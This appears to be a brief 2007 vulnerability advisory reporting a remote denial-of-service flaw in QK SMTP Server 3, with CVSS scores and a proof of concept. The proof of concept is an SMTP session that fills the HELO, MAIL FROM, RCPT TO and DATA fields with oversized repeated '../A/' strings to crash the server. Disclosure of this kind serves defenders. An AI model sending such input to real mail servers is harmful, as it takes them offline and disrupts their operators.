QK SMTP Server 3 - Denial of service
| Published | Credit |
Risk |
| 2007.12.28 |
Juan Pablo Lopez Yacubian |
Medium |
| CVSS Base Score |
Impact Subscore |
| Exploitability Subscore |
| 7.8/10 |
6.9/10 |
| 10/10 |
| Exploit range |
Attack complexity |
| Authentication |
| Remote |
Low |
| No required |
| Confidentiality impact |
Integrity impact |
| Availability impact |
| None |
None |
| Complete |
Apparently this SMTP server crashes when creating a mail poorly trained causing a denial of service.
Proof-of-concept
HELO ../A/ * 950
MAIL FROM: ../A/ * 950
RCPT TO: ../A/ * 950
data
../A/ * 950
.
Juan Pablo Lopez Yacubian
http://fuzzertina.blogspot.com/
ASCII VERSION
|
